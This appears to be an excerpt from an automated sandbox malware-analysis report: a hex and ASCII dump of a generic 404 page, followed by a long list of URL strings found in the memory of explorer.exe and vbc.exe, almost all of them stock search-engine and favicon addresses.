3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, 
user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
Source: explorer.exe, 00000006.00000000.2168485351.000000000A330000.00000008.00000001.sdmp | String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2168485351.000000000A330000.00000008.00000001.sdmp | String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2158689083.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2158023597.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.2158023597.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: vbc.exe, vbc.exe, 00000004.00000002.2146948401.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2140324393.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: vbc.exe, 00000004.00000002.2146948401.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2140324393.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: vbc.exe, 00000004.00000002.2149612513.0000000002330000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2158990238.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2158023597.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2158689083.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000006.00000000.2158689083.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2158023597.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.2168485351.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: vbc.exe, 00000004.00000002.2149612513.0000000002330000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2153195546.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
